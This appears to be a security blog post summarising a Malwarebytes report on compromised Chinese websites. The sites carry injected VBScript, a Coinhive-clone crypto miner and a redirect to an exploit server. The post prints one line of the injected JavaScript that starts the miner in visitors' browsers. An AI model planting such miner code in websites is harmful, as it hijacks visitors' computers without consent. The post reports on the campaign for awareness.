“For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China,” said Malwarebytes.
The campaign was detected because Malwarebytes researchers observed an abnormal situation: external content being embedded in iframes via scripts.
For instance, the researchers found a reference to a Coinhive clone:
var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', { threads: navigator.hardwareConcurrency, autoThreads: false, throttle: 0.2, forceASMJS: false }); miner.start();
Malwarebytes wrote:
We are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at ppoi[.]org) only takes a 10 percent commission as opposed to 30 percent for Coinhive.
(Chinese text on the clone's site, translated:) That is, you receive 90% of the mining revenue. Unlike a mining pool, this revenue is fixed: whether or not a block is found, you still receive it. We keep 10% to cover the losses from blocks not being found and to keep the servers running.
(English text on the same site:) I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this rate is fixed, regardless of actual blocks found and the luck involved finding them. We keep 10% for us to operate this service and to (hopefully) turn a profit
Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:
Official report here. Enjoy!
Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker/Pentester, Malware Researcher and Security Evangelist. He is also a founding member of CSIRT.UBI and Editor-in-Chief of the computer security blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also a freelance writer (Infosec Resources Institute and Cyber Defense Magazine) and the developer of 0xSI_f33d, a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.